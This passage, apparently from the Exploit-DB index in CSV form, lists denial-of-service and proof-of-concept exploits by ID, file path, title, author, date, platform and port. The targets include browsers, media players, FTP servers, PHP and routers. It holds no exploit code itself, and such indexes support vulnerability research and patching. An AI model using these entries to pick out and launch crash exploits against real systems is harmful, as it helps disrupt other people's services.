Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",linux,dos, -10185,exploits/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",bsd,dos, -10186,exploits/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",bsd,dos, -10187,exploits/bsd/dos/10187.txt,"Opera 10.01 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz & sp3x",bsd,dos, -10190,exploits/windows/dos/10190.txt,"Cisco VPN Client - Integer Overflow Denial of Service",2009-11-21,"Alex Hernandez",windows,dos, -10202,exploits/linux/dos/10202.c,"Linux Kernel < 2.6.31-rc4 - 'nfs4_proc_lock()' Denial of Service",2009-10-15,"Simon Vallet",linux,dos, -10203,exploits/linux/dos/10203.txt,"BibTeX - '.bib' File Handling Memory Corruption",2009-11-13,"Vincent Lafevre",linux,dos, -10204,exploits/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution",2009-11-19,mrx,windows,dos, -10205,exploits/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-11-12,wololo,multiple,dos, -10206,exploits/linux/dos/10206.txt,"Expat 2.0.1 - UTF-8 Character XML Parsing Remote Denial of Service",2009-11-12,"Peter Valchev",linux,dos, -10208,exploits/windows/dos/10208.txt,"Mozilla Firefox + Adobe - Memory Corruption (PoC)",2009-10-14,Skylined,windows,dos, -10210,exploits/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos, -40301,exploits/php/dos/40301.php,"PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos, -40302,exploits/php/dos/40302.php,"PHP 7.0 - Object Cloning Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos, -40305,exploits/php/dos/40305.txt,"PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos, -10221,exploits/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service",2009-11-24,leinakesi,windows,dos,21 -10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,windows,dos,21 -10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos, -10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,hardware,dos,80 -10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos, -10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos, -10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 -10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos, -10327,exploits/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos, -10333,exploits/windows/dos/10333.py,"VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC)",2009-12-06,Dr_IDE,windows,dos, -10334,exploits/multiple/dos/10334.py,"VideoLAN VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos, -10338,exploits/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption (PoC)",2009-12-07,"Jeremy Brown",linux,dos, -10343,exploits/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Service",2009-11-05,"Francis Provencher",windows,dos, -10349,exploits/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 -10352,exploits/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos, -10377,exploits/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 -10469,exploits/linux/dos/10469.py,"Monkey HTTP Daemon < 0.9.3 - Denial of Service",2009-12-16,"Patroklos Argyroudis",linux,dos,80 -14034,exploits/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos, -10489,exploits/windows/dos/10489.txt,"Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)",2009-12-16,Connection,windows,dos, -40306,exploits/php/dos/40306.php,"PHP 5.0.0 - 'xmldocfile()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos, -40307,exploits/multiple/dos/40307.txt,"Adobe Flash - Selection.setFocus Use-After-Free",2016-08-29,"Google Security Research",multiple,dos, -10553,exploits/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",hardware,dos, -10580,exploits/hardware/dos/10580.rb,"3Com OfficeConnect Routers - 'Content-Type' Denial of Service",2009-12-21,"Alberto Ortega",hardware,dos, -10593,exploits/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos, -10603,exploits/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos, -10617,exploits/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos, -10634,exploits/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)",2009-12-24,sandman,linux,dos, -10650,exploits/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos, -10651,exploits/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos, -10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,php,dos,80 -10825,exploits/php/dos/10825.sh,"WordPress 2.9 - Denial of Service",2009-12-31,emgent,php,dos,80 -10826,exploits/php/dos/10826.sh,"Drupal 5.21/6.16 - Denial of Service",2009-12-31,emgent,php,dos,80 -10829,exploits/php/dos/10829.pl,"vBulletin - Denial of Service",2009-12-30,R3d-D3V!L,php,dos, -10840,exploits/windows/dos/10840.pl,"VideoLAN VLC Media Player 1.0.3 - '.asx' Denial of Service (PoC)",2009-12-31,"D3V!L FUCKER",windows,dos, -10842,exploits/windows/dos/10842.py,"SimplePlayer 0.2 - '.wav' Overflow Denial of Service",2009-12-31,mr_me,windows,dos, -10870,exploits/multiple/dos/10870.html,"Opera 10.10 - Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos, -10879,exploits/windows/dos/10879.html,"Google Chrome 3.0195.38 - Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos, -10881,exploits/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - '.aap' Buffer Overflow Denial of Service",2009-12-31,jacky,windows,dos, -10902,exploits/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap (PoC)",2010-01-01,"D3V!L FUCKER",windows,dos, -10904,exploits/windows/dos/10904.pl,"Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service",2010-01-01,jacky,windows,dos, -10907,exploits/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Service (PoC)",2010-01-02,SarBoT511,windows,dos, -10908,exploits/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos, -10909,exploits/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos, -10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos, -10960,exploits/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos, -11009,exploits/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos, -11020,exploits/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos, -11021,exploits/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos, -11034,exploits/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos, -11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,hardware,dos, -11044,exploits/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos, -11052,exploits/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,windows,dos, -11053,exploits/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",windows,dos, -11062,exploits/windows/dos/11062.txt,"SopCast SopCore Control - ActiveX Remote Execution (PoC)",2010-01-08,superli,windows,dos, -11064,exploits/windows/dos/11064.txt,"UUSee ReliPlayer - ActiveX Remote Execution (PoC)",2010-01-08,superli,windows,dos, -11065,exploits/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)",2010-01-08,superli,windows,dos, -11070,exploits/windows/dos/11070.txt,"Microsoft Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos, -11084,exploits/windows/dos/11084.pl,"Real Player - Local Crash (PoC)",2010-01-10,"D3V!L FUCKER",windows,dos, -11095,exploits/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,blake,windows,dos, -11103,exploits/windows/dos/11103.html,"VideoLAN VLC Media Player 0.8.6i - ActiveX Denial of Service (PoC)",2010-01-10,"D3V!L FUCKER & germaya_x",windows,dos, -11106,exploits/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 - Denial of Service",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos, -11117,exploits/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service",2010-01-12,mr_me,ios,dos,8080 -11125,exploits/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow (Denial of Service) (PoC)",2010-01-13,"Julien Bedard",hardware,dos,2121 -11130,exploits/windows/dos/11130.pl,"Ofilter Player - 'skin.ini' Local Crash (PoC)",2010-01-13,"Rehan Ahmed",windows,dos, -11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,windows,dos, -11132,exploits/windows/dos/11132.pl,"Nemesis Player (NSP) - Local Denial of Service",2010-01-13,"Rehan Ahmed",windows,dos, -11133,exploits/windows/dos/11133.pl,"NPlayer - '.dat Skin' Local Heap Overflow (PoC)",2010-01-13,"Rehan Ahmed",windows,dos, -11142,exploits/multiple/dos/11142.txt,"Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow",2010-01-15,Dr_IDE,multiple,dos, -11145,exploits/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - Overwrite (SEH) (PoC)",2010-01-15,Darkb0x,windows,dos, -11149,exploits/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos, -11150,exploits/windows/dos/11150.txt,"Aqua Real 1.0/2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos, -11165,exploits/windows/dos/11165.pl,"MediaMonkey 3.2.0 - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos, -11176,exploits/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,dos, -11180,exploits/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos, -11182,exploits/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service",2010-01-18,"Mert SARICA",windows,dos, -11190,exploits/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos, -11192,exploits/windows/dos/11192.txt,"OpenOffice - '.slk' Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos, -11195,exploits/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow (PoC)",2010-01-19,SarBoT511,windows,dos, -11196,exploits/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow (PoC)",2010-01-19,"SarBoT511 & D3V!L FUCKER",windows,dos, -11197,exploits/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - '.smi' Local Buffer Overflow (PoC)",2010-01-19,d3b4g,windows,dos, -11209,exploits/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic - '.asx' Local Crash",2010-01-21,cr4wl3r,windows,dos, -11214,exploits/windows/dos/11214.html,"Microsoft Windows Live Messenger 2009 - ActiveX Heap Overflow (PoC)",2010-01-21,SarBoT511,windows,dos, -11217,exploits/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - Defer Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos, -11227,exploits/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos, -11228,exploits/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos, -11233,exploits/windows/dos/11233.pl,"QtWeb 3.0 - Remote Crash (Denial of Service)",2010-01-22,"Zer0 Thunder",windows,dos, -11234,exploits/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos, -11245,exploits/windows/dos/11245.txt,"Mozilla Firefox 3.6 - XML Parser Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos, -11247,exploits/windows/dos/11247.txt,"Opera 10.10 - XML Parser Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos, -11248,exploits/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos, -11254,exploits/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos, -11260,exploits/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,windows,dos, -11265,exploits/windows/dos/11265.pl,"KOL WaveIOX 1.04 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos, -11266,exploits/windows/dos/11266.pl,"KOL Wave Player 1.0 - '.wav' Local Buffer Overflow (PoC)",2010-01-26,cr4wl3r,windows,dos, -11273,exploits/ios/dos/11273.py,"iOS Serversman 3.1.5 - HTTP Remote Denial of Service",2010-01-27,mr_me,ios,dos, -11276,exploits/windows/dos/11276.txt,"Microsoft Internet Explorer 6.0/7.0 - Null Pointer crashes",2010-01-20,Skylined,windows,dos, -11288,exploits/multiple/dos/11288.py,"Wireshark 1.2.5 - LWRES getaddrbyname Stack Buffer Overflow",2010-01-29,babi,multiple,dos, -11291,exploits/hardware/dos/11291.txt,"Xerox Workcenter 4150 - Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos, -11320,exploits/windows/dos/11320.pl,"Digital Amp MP3 3.1 - '.mp3' Local Crash (PoC)",2010-02-02,SkuLL-HackeR,windows,dos, -11332,exploits/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,cr4wl3r,windows,dos, -11338,exploits/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,windows,dos, -11342,exploits/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos, -11343,exploits/windows/dos/11343.py,"httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC)",2010-02-07,loneferret,windows,dos, -11347,exploits/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos, -11351,exploits/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos, -11363,exploits/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",windows,dos, -11374,exploits/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos, -11391,exploits/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,windows,dos, -11392,exploits/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",windows,dos, -11397,exploits/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,cp77fk4r,php,dos, -11407,exploits/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",windows,dos,80 -11426,exploits/multiple/dos/11426.txt,"Multiple Browsers - Address bar Characters",2010-02-12,"Pouya Daneshmand",multiple,dos, -11427,exploits/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos, -11432,exploits/windows/dos/11432.txt,"Mozilla Firefox 3.6 - Denial of Service (1)",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos, -11438,exploits/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos, -11451,exploits/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' File Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos, -11467,exploits/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos, -11469,exploits/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos, -11470,exploits/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos, -11472,exploits/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos, -11492,exploits/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos, -11499,exploits/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos, -11520,exploits/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos, -11529,exploits/multiple/dos/11529.txt,"Adobe (Multiple Products) - XML External Entity / XML Injection",2010-02-22,"Roberto Suggi Liverani",multiple,dos, -11531,exploits/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos, -11532,exploits/windows/dos/11532.html,"Winamp 5.57 - 'Browser' IE Denial of Service",2010-02-22,cr4wl3r,windows,dos, -11533,exploits/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - ISO Compilation Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos, -11534,exploits/windows/dos/11534.pl,"VKPlayer 1.0 - '.mid' Denial of Service",2010-02-22,cr4wl3r,windows,dos, -11535,exploits/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - '.avi' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos, -11536,exploits/windows/dos/11536.pl,"GOM Player 2.1.21.4846 - '.wav' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos, -11537,exploits/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,cr4wl3r,windows,dos, -11540,exploits/windows/dos/11540.pl,"Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos, -11541,exploits/windows/dos/11541.pl,"Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos, -11546,exploits/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)",2010-02-23,b0telh0,hardware,dos, -11552,exploits/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos, -11556,exploits/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang - Remote Denial of Service",2010-02-23,Ale46,hardware,dos, -11567,exploits/multiple/dos/11567.txt,"Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)",2010-02-24,"Rad L. Sneak",multiple,dos, -11574,exploits/hardware/dos/11574.py,"iPhone - 'WebCore::CSSSelector()' Remote Crash",2010-02-24,t12,hardware,dos, -11590,exploits/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service (2)",2010-02-27,Ale46,multiple,dos, -11597,exploits/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,hardware,dos, -11601,exploits/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow / Denial of Service",2010-02-28,"John Cobb",windows,dos, -11608,exploits/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos, -11617,exploits/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos, -11622,exploits/windows/dos/11622.php,"Opera 10.50 - integer Overflow",2010-03-03,"Marcin Ressel",windows,dos, -11628,exploits/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow",2010-03-04,cr4wl3r,windows,dos, -11630,exploits/windows/dos/11630.pl,"WinSmMuPl 1.2.5 - '.mp3' Local Crash (PoC)",2010-03-04,cr4wl3r,windows,dos, -11632,exploits/windows/dos/11632.txt,"Orb 2.0.01.0049 < 2.54.0018 - DirectShow Denial of Service",2010-03-04,"Matthew Bergin",windows,dos, -11633,exploits/hardware/dos/11633.pl,"Sagem Routers - Remote Reset",2010-03-04,AlpHaNiX,hardware,dos, -11639,exploits/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service (PoC)",2010-03-06,Blade,windows,dos, -11644,exploits/multiple/dos/11644.py,"Flare 0.6 - Local Heap Overflow Denial of Service",2010-03-06,l3D,multiple,dos, -11652,exploits/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash",2010-03-07,l3D,windows,dos, -11669,exploits/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos, -11670,exploits/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos, -11705,exploits/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos, -11706,exploits/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos, -11714,exploits/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos, -11717,exploits/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service",2010-03-13,"Yakir Wizman",multiple,dos, -11724,exploits/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,windows,dos, -11728,exploits/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,windows,dos, -14367,exploits/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos, -11734,exploits/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Unauthenticated Remote Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,windows,dos, -11736,exploits/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 -11763,exploits/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,multiple,dos, -11769,exploits/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",hardware,dos, -11770,exploits/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST Denial of Service",2010-03-16,dmnt,linux,dos,21 -11792,exploits/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos, -11803,exploits/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,windows,dos, -11809,exploits/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,exploits/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 -11827,exploits/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos, -11838,exploits/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,windows,dos, -11839,exploits/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos, -11842,exploits/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos, -11855,exploits/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos, -11861,exploits/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos, -11878,exploits/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69 -11880,exploits/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos, -11890,exploits/ios/dos/11890.txt,"Apple iOS Safari - Bad 'VML' Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos, -11891,exploits/ios/dos/11891.txt,"Apple iOS Safari - Remote Denial of Service",2010-03-26,"Nishant Das Patnaik",ios,dos, -11893,exploits/linux/dos/11893.pl,"tPop3d 1.5.3 - Denial of Service",2010-03-26,OrderZero,linux,dos, -11930,exploits/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow (PoC)",2010-03-29,mat,windows,dos, -11932,exploits/linux/dos/11932.txt,"xwine 1.0.1 - '.exe' Local Crash (PoC)",2010-03-29,JosS,linux,dos, -11955,exploits/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos, -11959,exploits/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos, -11966,exploits/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos, -11975,exploits/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos, -11977,exploits/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos, -11984,exploits/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos, -11985,exploits/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos, -12000,exploits/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos, -12001,exploits/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos, -12010,exploits/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos, -12011,exploits/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",windows,dos, -12025,exploits/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",windows,dos, 